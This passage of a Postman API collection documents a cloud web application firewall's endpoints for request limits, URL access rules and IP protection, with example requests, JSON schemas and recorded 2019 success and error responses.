}\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/mitbprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","mitbprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:42:59 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"49"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"c9f9450b-933f-11e9-97ac-a96c66690638"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bko9gHjgoAMFZ3g="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b5523-cd1d3f4c56b1566c97d79a98;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"The parameter name cannot be blank.\"\n}"}],"_postman_id":"3b5ebacd-48ca-44ce-9023-0304174033a1"},{"name":"Get Request Limits","id":"ec12a475-cefd-4070-a96b-b6e64470f9b7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/requestlimits","description":"<p>Get the information of Request Limits configuration.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","requestlimits"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"80f2aa83-6c6d-4401-b6c7-3f088aabfeb1","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/requestlimits-none","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","requestlimits-none"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 07:24:07 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"67"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"ea89eb1b-7df4-11e9-9e04-5d44b53a2be0"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLVTnH5woAMFUNQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce79c17-dfc306a4ba900c1866d2510c;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Unsupported method or error key 'requestlimits-none'!\"\n}"},{"id":"bd8bf506-654a-49c1-b6a3-a943d76fe391","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/requestlimits","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","requestlimits"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 07:22:05 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"765"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"a1562409-7df4-11e9-b45a-45a3d354b189"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLVAbFtiIAMFbBw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce79b9c-f5d2d36c56897900ab8afd3c;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"action\": \"alert_deny\",\n        \"AllowMethodPolicy\": {\n            \"allow-method\": \"get post head options trace connect delete put patch webdav rpc others\"\n        },\n        \"HttpProtocolParameterRestriction\": {\n            \"illegal-byte-in-url-check\": \"enable\",\n            \"number-of-ranges-in-range-header\": 5,\n            \"max-header-line-request\": 32,\n            \"max-http-header-name-length\": 50,\n            \"malformed-url-check\": \"enable\",\n            \"max-url-param-name-len\": 4096,\n            \"max-http-header-value-length\": 4096,\n            \"max-http-header-length\": 8192,\n            \"duplicate-paramname-check\": \"enable\",\n            \"null-byte-in-url-check\": \"enable\",\n            \"max-url-param-value-len\": 4096,\n            \"max-url-parameter-length\": 8192,\n            \"max-cookie-in-request\": 128,\n            \"max-url-parameter\": 128,\n            \"redundant-header-check\": \"enable\",\n            \"max-http-request-filename-length\": 2048\n        }\n    }\n}"}],"_postman_id":"ec12a475-cefd-4070-a96b-b6e64470f9b7"},{"name":"Update Request Limits","id":"97dd50aa-89b5-4285-ae8d-d7baddd9f76a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"description":"<p>Token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"AllowMethodPolicy\": {\n        \"allow-method\": \"get post head options\"\n    },\n    \"HttpProtocolParameterRestriction\": {\n        \"illegal-byte-in-url-check\": \"enable\",\n        \"number-of-ranges-in-range-header\": 5,\n        \"max-header-line-request\": 32,\n        \"max-http-header-name-length\": 50,\n        \"malformed-url-check\": \"enable\",\n        \"max-url-param-name-len\": 4096,\n        \"max-http-header-value-length\": 4096,\n        \"max-http-header-length\": 8192,\n        \"duplicate-paramname-check\": \"enable\",\n        \"null-byte-in-url-check\": \"enable\",\n        \"max-url-param-value-len\": 4096,\n        \"max-url-parameter-length\": 8191,\n        \"max-cookie-in-request\": 121,\n        \"max-url-parameter\": 128,\n        \"redundant-header-check\": \"enable\",\n        \"max-http-request-filename-length\": 2048\n    }\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/requestlimits","description":"<p>Update the information about the Request Limits.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"allow-method\"],\n    \"properties\": {\n        \"_status\": {\n            \"description\": \"Configure to enable or disable request limits\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"action\": {\n            \"description\": \"The action when it detects the invalid http request\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"alert\",\n                \"alert_deny\",\n                \"block_period\",\n                \"deny_no_log\",\n            ],\n            \"default\": \"alert_deny\"\n        },\n        \"AllowMethodPolicy\": {\n            \"type\": \"object\",\n            \"properties\": {\n                \"allow-method\": {\n                    \"description\": \"Select the allow method\",\n                    \"type\": \"string\",\n                    \"default\": \"get post head options trace connect delete put patch webdav rpc others\"\n                }\n                \n            }\n\n        },\n        \"HttpProtocolParameterRestriction\": {\n            \"type\": \"object\",\n            \"required\": [\"max-http-header-name-length\", \"malformed-url-check\", \"max-url-param-value-len\", \"max-url-parameter-length\", \"max-cookie-in-request\", \"max-http-header-value-length\", \"max-url-parameter\",\n                    \"illegal-byte-in-url-check\", \"max-http-header-length\", \"redundant-header-check\", \"number-of-ranges-in-range-header\", \"duplicate-paramname-check\", \"max-header-line-request\", \"max-url-param-name-len\",\n                    \"max-http-request-filename-length\", \"null-byte-in-url-check\"],\n\n            \"properties\": {\n                \"max-http-header-name-length\": {\n                    \"description\": \"The maximum acceptable size in bytes of a single HTTP header name\",\n                    \"type\": \"integer\",\n                    \"minimum\": 0,\n                    \"maximum\": 255,\n                    \"default\": 50\n                },\n\n                \"malformed-url-check\": {\n                    \"description\": \"Configure to check whether the URL structure conforms to the RFC standard\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"enable\",\n                        \"disable\"\n                    ],\n                    \"default\": \"enable\"\n                },\n                \"max-url-param-value-len\": {\n                    \"description\": \"The maximum acceptable length in bytes of each URL parameter value in a request\",\n                    \"type\": \"integer\",\n                    \"minimum\": 0,\n                    \"maximum\": 8192,\n                    \"default\": 8192\n                },\n                \"max-url-parameter-length\": {\n                    \"description\": \"The maximum acceptable length in bytes of each URL parameter name in a request\",\n                    \"type\": \"integer\",\n                    \"minimum\": 0,\n                    \"maximum\": 12288,\n                    \"default\": 4096\n                },\n                \"max-cookie-in-request\": {\n                    \"description\": \"The maximum acceptable number of cookies in a request\",\n                    \"type\": \"integer\",\n                    \"minimum\": 0,\n                    \"maximum\": 1023,\n                    \"default\": 128\n                },\n                \"max-http-header-value-length\": {\n                    \"description\": \"The maximum acceptable size in bytes of a single HTTP header value\",\n                    \"type\": \"integer\",\n                    \"minimum\": 0,\n                    \"maximum\": 12288,\n                    \"default\": 4096\n                },\n                \"max-url-parameter\": {\n                    \"description\": \"The maximum number of parameters in the URL\",\n                    \"type\": \"integer\",\n                    \"minimum\": 0,\n                    \"maximum\": 1023,\n                    \"default\": 128\n                },\n                \"illegal-byte-in-url-check\": {\n                    \"description\": \"Configure to check whether the URL (or path for HTTP/2) in a request contains characters that are not allowed by the RFC\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"enable\",\n                        \"disable\"\n                    ],\n                    \"default\": \"enable\"\n                },\n                \"max-http-header-length\": {\n                    \"description\": \"The maximum acceptable size in bytes of all HTTP header lines\",\n                    \"type\": \"integer\",\n                    \"minimum\": 0,\n                    \"maximum\": 12288,\n                    \"default\": 8192\n                },\n                \"redundant-header-check\": {\n                    \"description\": \"Configure to check whether a HTTP request contains multiple instances of Content-Length (only for HTTP/1.x), Content-Type (for both HTTP/1.x and HTTP/2) and Host (for both HTTP/1.x and HTTP/2) header fields\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"enable\",\n                        \"disable\"\n                    ],\n                    \"default\": \"enable\"\n                },\n                \"number-of-ranges-in-range-header\": {\n                    \"description\": \"The maximum acceptable number of range: lines in each HTTP header\",\n                    \"type\": \"integer\",\n                    \"minimum\": 0,\n                    \"maximum\": 64,\n                    \"default\": 5\n                },\n                \"duplicate-paramname-check\": {\n                    \"description\": \"Configure to check whether a duplicate parameter name is in the header or body parameters\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"enable\",\n                        \"disable\"\n                    ],\n                    \"default\": \"enable\"\n                },\n                \"max-header-line-request\": {\n                    \"description\": \"The maximum acceptable number of lines in the HTTP header\",\n                    \"type\": \"integer\",\n                    \"minimum\": 0,\n                    \"maximum\": 32,\n                    \"default\": 32\n                },\n                \"max-url-param-name-len\": {\n                    \"description\": \"The maximum acceptable length in bytes of each URL parameter　name in a request\",\n                    \"type\": \"integer\",\n                    \"minimum\": 0,\n                    \"maximum\": 8192,\n                    \"default\": 4096\n                },\n                \"max-http-request-filename-length\": {\n                    \"description\": \"The maximum acceptable length in bytes of the HTTP request filename\",\n                    \"type\": \"integer\",\n                    \"minimum\": 0,\n                    \"maximum\": 12288,\n                    \"default\": 2048\n                },\n                \"null-byte-in-url-check\": {\n                    \"description\": \"Configure to check whether the URL (or path for HTTP/2) in a request contains null characters\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"enable\",\n                        \"disable\"\n                    ],\n                    \"default\": \"enable\"\n                }\n                \n            }\n        }\n    }\n\n}\n\n\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","requestlimits"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"1b98027f-7603-4a7b-b52a-48e272990002","name":"Success","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"AllowMethodPolicy\": {\n        \"allow-method\": \"get post head options\"\n    },\n    \"HttpProtocolParameterRestriction\": {\n        \"illegal-byte-in-url-check\": \"enable\",\n        \"number-of-ranges-in-range-header\": 5,\n        \"max-header-line-request\": 32,\n        \"max-http-header-name-length\": 50,\n        \"malformed-url-check\": \"enable\",\n        \"max-url-param-name-len\": 4096,\n        \"max-http-header-value-length\": 4096,\n        \"max-http-header-length\": 8192,\n        \"duplicate-paramname-check\": \"enable\",\n        \"null-byte-in-url-check\": \"enable\",\n        \"max-url-param-value-len\": 4096,\n        \"max-url-parameter-length\": 8191,\n        \"max-cookie-in-request\": 121,\n        \"max-url-parameter\": 128,\n        \"redundant-header-check\": \"enable\",\n        \"max-http-request-filename-length\": 2048\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/requestlimits","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","requestlimits"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 07:34:05 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"4e9316ef-7df6-11e9-8473-e1850fd8b969"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLWw9HEvoAMFQoA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce79e6c-ae508cc051d706744129e4d0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"1e80591e-f635-4fae-a283-ab2b6ce3fb0b","name":"Parameter Invalid(max-url-parameter-length)","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"AllowMethodPolicy\": {\n        \"allow-method\": \"get post head options\"\n    },\n    \"HttpProtocolParameterRestriction\": {\n        \"illegal-byte-in-url-check\": \"enable\",\n        \"number-of-ranges-in-range-header\": 5,\n        \"max-header-line-request\": 32,\n        \"max-http-header-name-length\": 50,\n        \"malformed-url-check\": \"enable\",\n        \"max-url-param-name-len\": 4096,\n        \"max-http-header-value-length\": 4096,\n        \"max-http-header-length\": 8192,\n        \"duplicate-paramname-check\": \"enable\",\n        \"null-byte-in-url-check\": \"enable\",\n        \"max-url-param-value-len\": 4096,\n        \"max-url-parameter-length\": 8192000,\n        \"max-cookie-in-request\": 128,\n        \"max-url-parameter\": 128,\n        \"redundant-header-check\": \"enable\",\n        \"max-http-request-filename-length\": 2048\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/requestlimits","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","requestlimits"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 07:32:11 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"97"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"0ae92938-7df6-11e9-af6d-33d4f11e3f14"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLWfNHiXIAMFTsw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce79dfa-805e810c35610444f5323284;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'max-url-parameter-length': 'Error value range, only allow 0-12288'}\"\n}"},{"id":"fc911f7a-51e9-4343-b903-e75fcd629c5e","name":"Parameter Invalid(allow-method)","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"AllowMethodPolicy\": {\n        \"allow-method\": \"get post head options invalid-method\"\n    },\n    \"HttpProtocolParameterRestriction\": {\n        \"illegal-byte-in-url-check\": \"enable\",\n        \"number-of-ranges-in-range-header\": 5,\n        \"max-header-line-request\": 32,\n        \"max-http-header-name-length\": 50,\n        \"malformed-url-check\": \"enable\",\n        \"max-url-param-name-len\": 4096,\n        \"max-http-header-value-length\": 4096,\n        \"max-http-header-length\": 8192,\n        \"duplicate-paramname-check\": \"enable\",\n        \"null-byte-in-url-check\": \"enable\",\n        \"max-url-param-value-len\": 4096,\n        \"max-url-parameter-length\": 8192,\n        \"max-cookie-in-request\": 128,\n        \"max-url-parameter\": 128,\n        \"redundant-header-check\": \"enable\",\n        \"max-http-request-filename-length\": 2048\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/requestlimits","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","requestlimits"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 07:30:27 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"77"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"ccb64f16-7df5-11e9-b292-1d67891561ee"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLWO6HExIAMFRKg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce79d92-29d5080c89d60708e8f21d18;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'allow-method': 'invalid method invalid-method'}\"\n}"}],"_postman_id":"97dd50aa-89b5-4285-ae8d-d7baddd9f76a"},{"name":"Get URL Access","id":"15d71f03-a9d9-4fc8-8c6c-6efe6a7f902c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/urlaccess","description":"<p>Get the information of URL access.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","urlaccess"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"6815f1e0-d72d-4cf8-b3e9-caef39ef79cb","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/urlaccess","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","urlaccess"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:43:54 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"76"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"eadaa11b-933f-11e9-a972-1fdfcf3d15ff"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkpGHHREoAMFQUQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b555a-e8701e13aa9b1e6c2060b3f4;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"urlaccess\": []\n    }\n}"},{"id":"f57dacfc-df04-4575-ad5f-1d0659d20b4c","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/urlaccess","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","urlaccess"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:44:31 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"00bac1c3-9340-11e9-a71e-7bb947d6e9fb"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"bkpL2HcroAMF8Ww="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"15d71f03-a9d9-4fc8-8c6c-6efe6a7f902c"},{"name":"Update URL Access","id":"8a0e9151-c40b-4ec2-a4d6-1ed3b91533bb","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"urlaccess\": [\n        {\n            \"action\": \"pass\",\n            \"name\": \"rule1\",\n            \"reg-exp\": \"/abc\"\n        }\n    ]\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/urlaccess","description":"<p>Update the information about URL Access.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"_status\": {\n            \"description\": \"Configure to enable or disable URL access\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"urlaccess\": {\n            \"type\": \"object\",\n            \"properties\": {\n                \"members\": {\n                    \"type\": \"array\",\n                    \"maxItems\": 256,\n                    \"items\": {\n                        \"type\": \"object\",\n                        \"required\": [\"name\", \"action\", \"reg-exp\"],\n                        \"properties\": {\n                            \"name\": {\n                                \"description\": \"The name for URL access rule\",\n                                \"type\": \"string\"\n                            },\n                            \"reg-exp\": {\n                                \"description\": \"The literal URL\",\n                                \"type\": \"string\"\n                            },\n                            \"action\": {\n                                \"description\": \"The action that Continent 8 Cloud WAF takes when it detects a violation of the rule\",\n                                \"type\": \"string\",\n                                \"enum\": [\"pass\",\"alert_deny\",\"deny_no_log\",\"continue\"],\n                                \"default\": \"pass\"\n                            }\n                        }\n                    }\n                }\n            }\n        }\n    }\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","urlaccess"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"81c0aba7-f416-433c-80d5-cb66290ac775","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"urlaccess\": [\n        {\n            \"action\": \"pass\",\n            \"name\": \"rule1\",\n            \"reg-exp\": \"abc\"\n        }\n    ]\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/urlaccess","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","urlaccess"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:46:06 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"50"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"399affb7-9340-11e9-b8d2-9fca7b4f4748"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkpaxEDToAMF2WQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b55de-23d385f47a226760769d5898;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"The request URL must start with '/'.\"\n}"},{"id":"e93abc0e-b1e7-4e0d-bc2c-b42d2d733a51","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"urlaccess\": [\n        {\n            \"action\": \"pass\",\n            \"name\": \"rule1\",\n            \"reg-exp\": \"/abc\"\n        }\n    ]\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/urlaccess","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","urlaccess"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:45:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"2dfa9ef0-9340-11e9-800b-7784b92e5419"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkpXuEpBoAMF5uQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b55cb-4501fc0c64d230e81ce23f41;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"}],"_postman_id":"8a0e9151-c40b-4ec2-a4d6-1ed3b91533bb"},{"name":"Get IP Protection","id":"7296b790-03b9-483b-a805-4c968a4e851e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/ipprotection","description":"<p>Get the configuration information of IP protection.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","ipprotection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"8c498a2a-56ab-4105-8f6c-a4ace9aa97eb","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/IPProtection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","IPProtection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 03:14:10 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"5623ac57-7aad-11e9-b8e5-fddc64b0ceb2"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"Z9k8YHF4IAMFvkA="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"ff3838c6-5a4d-4c05-a570-6351f08045f1","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/IPProtection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","IPProtection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 03:13:21 